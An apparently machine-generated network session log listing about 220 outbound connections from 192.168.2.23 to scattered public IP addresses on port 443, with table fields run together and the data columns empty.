                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17973192.168.2.2350832173.41.168.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17974192.168.2.234661098.74.112.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17975192.168.2.233620437.22.82.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17976192.168.2.2359038216.255.128.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17977192.168.2.235948094.132.117.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17978192.168.2.2360032157.99.187.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17979192.168.2.2335226167.54.51.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17980192.168.2.2339638184.244.7.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17981192.168.2.235294824.248.53.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17982192.168.2.235399466.88.8.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17983192.168.2.2353640191.239.128.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17984192.168.2.2351858126.59.60.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17985192.168.2.235331438.160.89.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17986192.168.2.2334956180.253.252.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17987192.168.2.2354312141.194.17.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17988192.168.2.2339408165.253.90.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17989192.168.2.2347112139.114.32.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17990192.168.2.233697466.12.109.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17991192.168.2.235009861.136.68.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17992192.168.2.233892472.91.68.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17993192.168.2.2339994196.98.253.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17994192.168.2.234479654.7.194.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17995192.168.2.2358390125.228.42.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17996192.168.2.2335252194.36.3.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17997192.168.2.2356892200.56.242.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17998192.168.2.2344708179.171.71.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17999192.168.2.2344394162.124.54.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18000192.168.2.2345220191.143.166.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18001192.168.2.2344668202.195.206.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18002192.168.2.236074291.236.157.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18003192.168.2.2351494104.81.119.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18004192.168.2.2347070167.253.74.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18005192.168.2.2334300171.109.28.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18006192.168.2.234381884.19.38.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18007192.168.2.234727427.34.59.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18008192.168.2.2357066172.11.10.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18009192.168.2.2342616193.114.141.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18010192.168.2.2358940158.218.147.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18011192.168.2.2350692138.202.229.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18012192.168.2.2340548121.196.175.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18013192.168.2.2359410158.90.79.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18014192.168.2.2333050112.16.49.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18015192.168.2.2357232149.44.77.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18016192.168.2.234936838.207.186.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18017192.168.2.234681689.29.178.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18018192.168.2.234507663.107.172.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18019192.168.2.235671272.151.178.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18020192.168.2.235014623.128.43.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18021192.168.2.2348142170.244.124.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18022192.168.2.234348019.5.0.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18023192.168.2.2346970219.183.134.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18024192.168.2.233661441.228.217.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18025192.168.2.234122058.233.122.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18026192.168.2.235813458.168.113.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18027192.168.2.2358502162.154.204.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18028192.168.2.2356792150.229.124.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18029192.168.2.2354564152.170.210.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18030192.168.2.234814266.254.217.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18031192.168.2.2344428188.192.54.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18032192.168.2.2356636164.224.170.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18033192.168.2.2354056146.69.156.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18034192.168.2.2335584142.252.15.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18035192.168.2.234565627.86.33.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18036192.168.2.2354878110.63.123.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18037192.168.2.2342190118.246.101.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18038192.168.2.233833672.40.51.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18039192.168.2.2353974151.222.40.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18040192.168.2.2345610175.198.239.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18041192.168.2.2350534201.165.250.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18042192.168.2.233441060.204.31.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18043192.168.2.2351664116.239.55.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18044192.168.2.236079612.235.124.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18045192.168.2.2347062109.92.26.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18046192.168.2.2345720187.18.108.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18047192.168.2.2336258104.147.136.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18048192.168.2.2333836216.17.218.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18049192.168.2.235690224.240.89.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18050192.168.2.235401898.113.56.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18051192.168.2.234239238.227.254.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18052192.168.2.2337056165.84.202.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18053192.168.2.2341878203.129.53.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18054192.168.2.2351748167.7.30.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18055192.168.2.235911846.183.89.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18056192.168.2.234467082.144.76.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18057192.168.2.2360602159.105.106.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18058192.168.2.2354664117.110.146.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18059192.168.2.2359948187.89.41.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18060192.168.2.2337774164.3.112.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18061192.168.2.2341220204.16.189.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18062192.168.2.235186437.213.114.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18063192.168.2.234367683.138.249.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18064192.168.2.236077488.114.3.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18065192.168.2.233421013.35.54.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18066192.168.2.2336470181.47.28.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18067192.168.2.2350522135.15.147.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18068192.168.2.2345956110.114.163.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18069192.168.2.2350636104.9.46.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18070192.168.2.2342474158.250.165.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18071192.168.2.2351132211.201.171.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18072192.168.2.2344060159.95.115.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18073192.168.2.234171489.25.66.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18074192.168.2.234745683.179.205.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18075192.168.2.2342108216.224.181.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18076192.168.2.2344132194.151.123.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18077192.168.2.233742623.135.78.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18078192.168.2.233459847.220.179.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18079192.168.2.234686042.158.107.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18080192.168.2.2342784182.43.128.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18081192.168.2.2359578222.20.178.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18082192.168.2.2347436187.56.244.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18083192.168.2.234211859.139.153.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18084192.168.2.2337316160.95.196.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18085192.168.2.2354650184.162.72.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18086192.168.2.2355630174.102.214.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18087192.168.2.2349828113.252.97.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18088192.168.2.233346485.144.187.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18089192.168.2.234425031.249.113.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18090192.168.2.2333760222.181.12.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18091192.168.2.2340266181.55.145.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18092192.168.2.233977280.172.84.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18093192.168.2.2346410223.91.78.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18094192.168.2.2356122213.64.158.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18095192.168.2.2360156149.91.189.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18096192.168.2.233896014.238.129.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18097192.168.2.2342130147.159.36.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18098192.168.2.2336956140.105.95.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18099192.168.2.2358908112.242.121.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18100192.168.2.2342450137.234.141.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18101192.168.2.234098682.97.39.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18102192.168.2.2349598203.215.189.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18103192.168.2.2360116187.137.50.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18104192.168.2.2355038128.15.96.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18105192.168.2.235389498.185.123.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18106192.168.2.2350724183.222.175.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18107192.168.2.233777288.239.93.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18108192.168.2.2358556212.184.74.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18109192.168.2.236067245.70.112.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18110192.168.2.2340034188.228.159.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18111192.168.2.2358890218.27.199.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18112192.168.2.235849649.232.158.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18113192.168.2.2344438136.69.217.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18114192.168.2.234626687.171.215.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18115192.168.2.2339032126.60.200.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18116192.168.2.233313843.130.240.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18117192.168.2.2356876159.93.237.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18118192.168.2.2345966189.58.59.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18119192.168.2.235153882.4.146.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18120192.168.2.234518882.94.232.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18121192.168.2.235644699.219.229.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18122192.168.2.233282620.58.171.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18123192.168.2.2350730137.23.81.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18124192.168.2.2352516190.201.211.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18125192.168.2.234345874.160.89.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18126192.168.2.234317095.62.85.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18127192.168.2.234710891.207.208.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18128192.168.2.2352822119.151.63.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18129192.168.2.2358292117.127.2.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18130192.168.2.2349822175.12.179.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18131192.168.2.234574644.73.154.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18132192.168.2.2343756183.234.214.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18133192.168.2.234430680.12.11.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18134192.168.2.2346038156.76.20.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18135192.168.2.233650848.104.200.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18136192.168.2.234218893.244.183.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18137192.168.2.2338852153.247.29.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18138192.168.2.235803472.129.103.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18139192.168.2.233918863.3.99.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18140192.168.2.235454017.59.48.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18141192.168.2.2341840188.218.57.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18142192.168.2.2344354164.96.167.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18143192.168.2.234660877.235.252.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18144192.168.2.2343554148.68.81.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18145192.168.2.2341136197.178.99.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18146192.168.2.2345828209.187.58.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18147192.168.2.2351694135.10.179.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18148192.168.2.235040477.131.42.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18149192.168.2.2347808113.89.155.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18150192.168.2.2345118141.156.16.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18151192.168.2.233865457.121.0.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18152192.168.2.233360057.189.213.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18153192.168.2.233502279.32.129.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18154192.168.2.2341928170.101.74.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18155192.168.2.2357022153.43.50.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18156192.168.2.2339080166.144.228.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18157192.168.2.2351090109.14.109.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18158192.168.2.233917280.174.254.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18159192.168.2.2352740149.31.93.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18160192.168.2.234799027.136.164.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18161192.168.2.2344032130.198.168.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18162192.168.2.2347864165.119.67.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18163192.168.2.234098812.247.73.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18164192.168.2.2344228167.181.130.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18165192.168.2.234246237.76.231.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18166192.168.2.2340274160.96.196.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18167192.168.2.235919437.192.213.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18168192.168.2.2346566139.215.218.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18169192.168.2.23340109.178.121.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18170192.168.2.2351748192.36.16.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18171192.168.2.2350262194.86.130.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18172192.168.2.233844878.186.142.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18173192.168.2.2343504204.218.150.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18174192.168.2.235226863.160.190.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18175192.168.2.2350030195.88.17.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18176192.168.2.234020668.165.18.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18177192.168.2.2332860156.248.203.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18178192.168.2.2358006173.18.231.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18179192.168.2.233953683.87.6.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18180192.168.2.2354580223.194.154.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18181192.168.2.236049231.93.21.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18182192.168.2.233791687.254.117.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18183192.168.2.2352588121.145.131.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18184192.168.2.2336204125.80.104.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18185192.168.2.2337844128.169.61.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18186192.168.2.234480276.183.219.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18187192.168.2.2355258177.248.18.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18188192.168.2.234841480.27.32.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18189192.168.2.2360376180.161.111.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18190192.168.2.234354232.43.95.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18191192.168.2.2350880158.92.250.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18192192.168.2.234267096.53.68.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18193192.168.2.234619458.216.177.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
